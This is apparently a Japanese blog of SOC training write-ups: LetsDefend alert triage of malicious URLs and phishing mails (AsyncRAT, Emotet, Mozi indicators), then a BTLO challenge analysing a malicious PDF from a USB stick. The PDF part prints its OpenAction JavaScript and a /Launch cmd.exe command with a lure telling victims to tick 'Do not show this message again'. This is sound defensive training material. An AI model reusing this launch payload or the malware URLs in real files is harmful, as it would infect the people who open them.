LetsDefend level 1 alert SOC102 - Proxy - Suspicious URL Detected event-id 26
Details
EventID: 26
Event Time: Oct. 29, 2020, 7:05 p.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 217.8.117.77
Destination Hostname jamesrlongacre.ac.ug
Username Bill
Request URL http[:]//jamesrlongacre.ac[.]ug/ac.exe
User Agent: Firewall Test - Dont Block
Device Action Blocked
playbook
Analyze URL Address
まずはIPから調査、
217.8.117.7
VirusTotal 5/90: https://www.virustotal.com/gui/ip-address/217.8.117.7
URLhaus: https://urlhaus.abuse.ch/browse.php?search=217.8.117.77
ip-sc: https://ip-sc.net/ja/r/217.8.117.77
VTでは登録数は多くないが、URLhausでAsyncRAT,ArkeiStealer,AZORult,RacoonStealer等の様々なマルウェアとの関連が報告されているため
IPがMaliciousであると判断しても良い。
ip-scにて脅威レベルは低いとされている、ロシアのIPである。
http[:]//jamesrlongacre.ac[.]ug/ac.exe
VirusTotal 10/93: https://www.virustotal.com/gui/url/3114ff42180d969ca55e5b84e12ec4119bf402e520f5ad4f27eec137d1a8ec4f
URLhaus: https://urlhaus.abuse.ch/url/748266/
URLをVTで検索すると登録数は増え、URLhausでも確認した。AsyncRATのダウンロードであるらしい。
AsyncRAT (Malware Family)
ダウンロードされるファイルはVTのレポートを見ると、何度も同じIPから配布されていた。
VirusTotal: ac.exe
User Agent: Firewall Test - Dont Block <- ????
ここまでこれば、今回ブロックされたURLはMaliciousであるということは間違いないと言える。
ただ、気になるのはUser Agentだ。これは、もしかするとセキュリティテストの一環としての作業に利用していたことも考えられるが、
アクセス先は明らかに怪しい。
また、このホストからは29分後に以下の記事で解析を行ったアラートが検知されている。
LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28 - 4ensiX
後のアラートの関連性は分からないが、テストに見せかけた攻撃と思える。
Answer:Malicious
Has Anyone Accessed IP/URL/Domain?
Device Action Blocked
Logも確認し、ブロックされている。
DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|
Oct, 29, 2020, 07:05 PM | Proxy | 172.16.17.47 | 39485 | 217.8.117.77 | 443 |
Request URL: http://jamesrlongacre.ac.ug/ac.exe Request Method: GET Device Action: Blocked Process: chrome.exe Parent Process: explorer.exe Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e
Answer:Not Accessed
Add Artifacts
Value | Type | Comment |
---|---|---|
http[:]//jamesrlongacre.ac[.]ug/ac.exe | URL Address | AsyncRAT distribution server (217.8.117.77) |
217.8.117.77 | IP Address | Multiple malwares distribution server |
True Positive
End
LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 27
Details
EventID: 27
Event Time: Oct. 29, 2020, 7:25 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 146.56.209.252
Source Address ndt@zol.co.zw
Destination Address susie@letsdefend.io
E-mail Subject UPS Your Packages Status Has Changed
Device Action Blocked
playbook
Are there attachments or URLs in the email?
Answer:Yes
Analyze Url/Attachment
Sender IP 146.56.209.252
VirusTotal: https://www.virustotal.com/gui/ip-address/146.56.209.252/detection
AbuseIPDB: https://www.abuseipdb.com/check/146.56.209.252
ip-sc: https://ip-sc.net/ja/r/146.56.209.252
ip元は中国でShenzhen Tencent。SSHブルートフォース元として利用されている。
Sender Domain zol.co[.]zw
Hybrid-Analysis: https://www.hybrid-analysis.com/search?query=zol.co.zw
怪しいドメインではある。
UPS Your Packages Status Has Changed From: ndt@zol.co.zw Oct. 29, 2020, 7:25 p.m. To: susie@letsdefend.io Oct. 29, 2020, 7:25 p.m. You have received a secure message from a Veterans United Employee. Click below link by 2020-11-14 14:30 CDT to read your message. After that, open attachment. https://hredoybangladesh.com/content/docs/wvoiha4vd1aqty/
URL link: https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/
VirusTotal: https://www.virustotal.com/gui/url/2825a389272fd0e4b9923c98644a1786d4019ec7002c0a718b59dbe6d713a889
URLhaus: https://urlhaus.abuse.ch/url/698975/
現在はページ確認できないために分からないが、VTのレポートからはマルウェアダウンロードURLであるとのレポートがあり、URLhausからemotetやheodoに関連するとの報告がある。
URLhausにおいて報告されているリンクに関連するファイルとして最も新しいものは,
VirusTotal: https://www.virustotal.com/gui/file/360a5cb7eed923017b4ef07460e7652362cdf1fc0a902516addbb8e244e30134/detection/f-360a5cb
このファイルと同じハッシュのものをANYRUNで探すと、
ANYRUN: https://app.any.run/tasks/989ac1f3-9d9e-4854-80c1-f65b1b8cd1a2/
マクロからpowershellの実行、ダウンロードしたものを実行し、C2サーバとの連携や自動起動設定等々を行っている。
hredoybangladesh[.]com
ドメインもいくつかのベンダーに登録されている。
VirusTotal: https://www.virustotal.com/gui/domain/hredoybangladesh.com/detection
Answer:Malicious
Check If Mail Delivered to User?
Device Action Blocked
Answer: Not Delivered
Add Artifacts
Value | Type | Comment |
---|---|---|
ndt@zol.co.zw | E-mail Sender | 146.56.209.252 |
https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/ | URL Address | download link(emotet,heodo) |
End
LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28
Details
EventID: 28
Event Time: Oct. 29, 2020, 7:34 p.m.
Rule: SOC105 - Requested T.I. URL address
Level: Security Analyst
Source Address 172.16.17.47
Source Hostname BillPRD
Destination Address 115.99.150.132
Username Bill
Request URL http[:]//115.99.150.132:56841/Mozi.m
User Agent Firewall Test - Dont Block
Device Action Blocked
playbook
Analyze Threat Intel Data
http[:]//115.99.150.132:56841/Mozi.m
VirusTotal: https://www.virustotal.com/gui/url/95f3eda1ff810022df76400ab1d5f2e4ac44817f116678132486fc92ec6aab46
URLhaus: https://urlhaus.abuse.ch/url/748225/
VTでは有名どころのベンダーによってMalicious判定されているためURLは怪しい。
URLhausにあるためにURLは間違いなくマルウェアに関連している。
Download file Mozi.m
- b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605
VirusTotal 42/61: https://www.virustotal.com/gui/file/b5cf68c7cb5bb2d21d60bf6654926f61566d95bfd7c9f9e182d032f1da5b4605/detection/f-b5cf68c
実際のファイルが取得できなかったために中身は分からないがelfファイルのようだ。VTからもMaliciousである。
Answer: Malicious
Interaction with TI data
Log search
DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|
Oct, 29, 2020, 07:34 PM | Proxy | 172.16.17.47 | 46938 | 115.99.150.132 | 56841 |
Request URL: http://115.99.150.132:56841/Mozi.m Request Method: GET Device Action: Blocked Process: chrome.exe Parent Process: explorer.exe Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e
アクセスはブロックされている。
Endpointには手がかりは見つからなかった。
Answer: Not Accessed
Add Artifacts
Value | Type | Comment |
---|---|---|
http[:]//115.99.150.132:56841/Mozi.m | URL Address | download malware |
a73ddd6ec22462db955439f665cad4e6 | MD5 Hash | Mozi.m - elf malware? |
End
古いアラートは面白みが無い。
LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 29
Details
EventID: 29
Event Time: Oct. 29, 2020, 7:43 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address 191.233.193.73
Source Address icianb@hotmail.com
Destination Address sofia@letsdefend.io
E-mail Subject Invoice
Device Action Blocked
playbook
Are there attachments or URLs in the email?
Invoice From: icianb@hotmail.com Oct. 29, 2020, 7:43 p.m. To: sofia@letsdefend.io Oct. 29, 2020, 7:43 p.m. Hello, Attached copy of your unpaid invoice & Statement Our Statement shows 2 invoices are paid. Our AP did confirmed payment was paid on the 13th of October into your Bank account. Thank you. Attachments: 4abd5dd8377e5810116f3665bd8d92f0.zip
Answer:Yes
Analyze Url/Attachment
メール元はhotmailなので何とも言えず。今回問題はAttachmentsにありそうだ。
$ sha256sum 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe
VirusTotal 35/68: https://www.virustotal.com/gui/file/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/detection
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/5f9d102805f963128371eff5
とりあえずのところMaliciousで問題は無い。network device lookupを行っているのも怪しいと。VTにはAPT Scannerであるというレポートがある。
Answer:Malicious
Check If Mail Delivered to User?
Device Action Blocked
Answer:Not Delivered
Add Artifacts
Value | Type | Comment |
---|---|---|
icianb@hotmail.com | E-mail Sender | 191.233.193.73 |
4abd5dd8377e5810116f3665bd8d92f0 | MD5 Hash | APT Scanner? Malicious by VT |
End
BTLO Challenge Suspicious USB Stick(Retired Challenge) write up
BTLO Challenge Suspicious USB Stick(Retired Challenge)
- Scenario
- Challenge Submission
- 1. What file is the autorun.inf running? (3 points)
- 2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
- 3. Does the file have the correct magic number? (2 points)
- 4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
- 5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
- 6. How many suspicious /OpenAction elements does the file have? (5 points)
Scenario
One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?
Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.
Challenge Submission
1. What file is the autorun.inf running? (3 points)
Format: filename.extension
$ cat autorun.inf [autorun] open=README.pdf icon=autorun.ico
Answer: README.pdf
2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)
True or False
SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43 https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43
38/59
Answer: False
3. Does the file have the correct magic number? (2 points)
True or False
$ file README.pdf README.pdf: PDF document, version 1.7 $ hexdump -C README.pdf | head 00000000 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d |%PDF-1.7..%.....| 00000010 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 |.1 0 obj..<</Typ| 00000020 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 |e/Catalog/Pages | 00000030 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 2d 55 53 |2 0 R/Lang(en-US| 00000040 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f |) /StructTreeRoo| 00000050 74 20 31 30 20 30 20 52 2f 4d 61 72 6b 49 6e 66 |t 10 0 R/MarkInf| 00000060 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e |o<</Marked true>| 00000070 3e 2f 4d 65 74 61 64 61 74 61 20 32 30 20 30 20 |>/Metadata 20 0 | 00000080 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e |R/ViewerPreferen| 00000090 63 65 73 20 32 31 20 30 20 52 3e 3e 0d 0a 65 6e |ces 21 0 R>>..en|
Answer: True
4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)
Operating System
$ pdfinfo README.pdf Creator: StarMan CreationDate: Thu Feb 11 02:54:49 2021 EST ModDate: Thu Feb 11 02:54:49 2021 EST Tagged: yes UserProperties: no Suspects: no Form: none Syntax Warning: Bad launch-type link action JavaScript: no Pages: 1 Encrypted: no Page size: 612 x 792 pts (letter) Page rot: 0 File size: 136561 bytes Optimized: no PDF version: 1.7 $ pdfid README.pdf PDFiD 0.2.7 README.pdf PDF Header: %PDF-1.7 obj 25 endobj 25 stream 7 endstream 7 xref 4 trailer 4 startxref 4 /Page 2 /Encrypt 0 /ObjStm 1 /JS 1 /JavaScript 1 /AA 1 /OpenAction 1 /AcroForm 0 /JBIG2Decode 0 /RichMedia 0 /Launch 1 /EmbeddedFile 0 /XFA 0 /Colors > 2^24 0 $ pdf-parser -a README.pdf This program has not been tested with this version of Python (3.9.7) Should you encounter problems, please use Python version 3.8.7 Comment: 8 XREF: 4 Trailer: 4 StartXref: 4 Indirect object: 24 8: 4, 9, 18, 19, 21, 24, 26, 9 /Action 2: 27, 28 /Catalog 2: 1, 1 /ExtGState 2: 7, 8 /Filespec 1: 25 /Font 1: 5 /FontDescriptor 1: 6 /Metadata 2: 20, 20 /ObjStm 1: 17 /Page 2: 3, 3 /Pages 1: 2 /XRef 1: 22 Search keywords: /JS 1: 27 /JavaScript 1: 27 /AA 1: 3 /OpenAction 1: 1 /Launch 1: 28 # /JS,/JavaScript,/OpenAction,/Launchのチェック $ pdf-parser -o 27 README.pdf This program has not been tested with this version of Python (3.9.7) Should you encounter problems, please use Python version 3.8.7 obj 27 0 Type: /Action Referencing: << /S /JavaScript /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });) /Type /Action >> $ pdf-parser -o 1 README.pdf This program has not been tested with this version of Python (3.9.7) Should you encounter problems, please use Python version 3.8.7 obj 1 0 Type: /Catalog Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R << /Type /Catalog /Pages 2 0 R /Lang (en-US) /StructTreeRoot 10 0 R /MarkInfo << /Marked true >> /Metadata 20 0 R /ViewerPreferences 21 0 R >> obj 1 0 Type: /Catalog Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R << /Type /Catalog /Pages 2 0 R /Names 23 0 R /OpenAction 27 0 R /Lang (en-US) /StructTreeRoot 10 0 R /MarkInfo << /Marked true >> /Metadata 20 0 R /ViewerPreferences 21 0 R >> $ pdf-parser -o 28 README.pdf This program has not been tested with this version of Python (3.9.7) Should you encounter problems, please use Python version 3.8.7 obj 28 0 Type: /Action Referencing: << /S /Launch /Type /Action /Win << /F (cmd.exe) /D '(c:\\\\windows\\\\system32)' /P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)' >> >>
Answer: windows
5. A Windows executable is mentioned in the pdf file, what is it? (3 points)
Format: filename.exe
$ pdf-parser -o 28 README.pdf
の結果より、
Answer: cmd.exe
6. How many suspicious /OpenAction elements does the file have? (5 points)
$ pdfid README.pdf
の結果、そしてobj 1の/OpenAction 27
と怪しいJavaScriptの実行がある。
Answer: 1